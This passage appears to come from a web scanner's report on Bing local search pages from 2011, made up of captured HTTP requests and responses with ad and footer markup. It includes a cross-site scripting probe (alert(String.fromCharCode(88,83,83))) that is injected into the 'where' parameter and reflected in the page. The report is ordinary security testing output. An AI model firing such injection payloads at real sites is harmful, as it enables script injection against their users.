<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="site" onclick="window.open(this.href); return false;">www.CrownePlaza.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="head" onclick="window.open(this.href); return false;">washington hotels</a>
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="body" onclick="window.open(this.href); return false;">Huge Savings on D.C. Trips. Plus No More Change or Cancel Fees.</a>
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="site" onclick="window.open(this.href); return false;">www.Travelocity.com/Hotels</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="head" onclick="window.open(this.href); return false;">Hotel in Washington D.C.</a>
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="body" onclick="window.open(this.href); return false;">Impeccable Service & Impossible to Beat Location. Book our Lowest Rate</a>
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="site" onclick="window.open(this.href); return false;">www.InterContinental.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="head" onclick="window.open(this.href); return false;">100 Hotels Washington DC</a>
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="body" onclick="window.open(this.href); return false;">Save up to 50% on your reservation. Book online now. Pay at the hotel.</a>
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="site" onclick="window.open(this.href); return false;">www.booking.com/Washington-DC</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocalbusiness&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLDP&amp;P5=&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=YN165x3137627&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdetails.aspx%3flid%3dYN165x3137627%26q%3dRestaurants%26qt%3dyp%26tid%3dde23686c9d194a6fb644dc125b68270e%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.5. http://www.bing.com/local/locationselector.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/locationselector.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(String.fromCharCode(88,83,83))-'6f0e1fe887b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:38:51 GMT
Last-Modified: Fri, 11 Feb 2011 22:38:51 GMT
X-BM-TraceID: bd57401dd9704959b64d06f9e82d5827
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 25985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2flocationselector.aspx%3fwhere%3daa461'-alert(String.fromCharCode(88%252c83%252c83))-'6f0e1fe887b%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.6. http://www.bing.com/local/us/co/colorado%20springs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/us/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 749f07315b7f481d9bcac535c037827d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001205
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_UserLocation=Colorado Springs, CO; path=/local
Set-Cookie: VE_UserLatLong=38.83310995996,-104.821729436517; path=/local
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs
Content-Length: 26370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=colorado%20springs%2c%20co%2c%20us&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3dcolorado%20springs%252c%2bco%252c%2bus%26%26form%3dllsv" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.7. http://www.bing.com/local/us/dc/washington/restaurants/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:37:59 GMT
Last-Modified: Fri, 11 Feb 2011 22:37:59 GMT
X-BM-TraceID: a58b304d7fbc4d6ca32567cddb61ef32
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 81374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
wMDUyQ0I=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '0', 'YellowPages-LSV', 'DWLPAV');"><img id="AdResultSetControl_rpt1_ctl00_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC260551.gif" style="border-width:0px;" /></a>
...[SNIP]...
wMDU0MDI=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '1', 'YellowPages-LSV', 'DWLPAV');"><img id="AdResultSetControl_rpt1_ctl01_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC92973.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="AdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="AdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl00_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3137627\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1prg_6cJYChXMBpSrR2CyVt1M5A9kccp3DqvLzulHMmftXMCVLtB8CNqRIgBUdXfqYIFJFlIDhox0" style="border-width:0px;" />
<a id="srs_rpt1_ctl00_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl00_sritem_ec2_ohlWeb" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl00_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl01_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl01_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3125023\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '1', '');" Width="75" align="center" src="http://byfiles.storage.msn.com/y1pqiyeF9LCo-dLWl58_T7ZqCIRHsJMI75PmY-JbXgtPMb7YnezaSYYHjhS1o1hTQjOAcgtF0gTKJ8" style="border-width:0px;" />
<a id="srs_rpt1_ctl01_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl01_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl01_sritem_ec2_ohlWeb" href="http://www.zaytinya.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '1', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl02_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl02_sritem_ec2_ohlWeb" href="http://www.tabardinn.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x172195977', '2', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl02_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/reservation/2163153/washington_dc/tabard_inn.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x172195977', '2', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl03_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
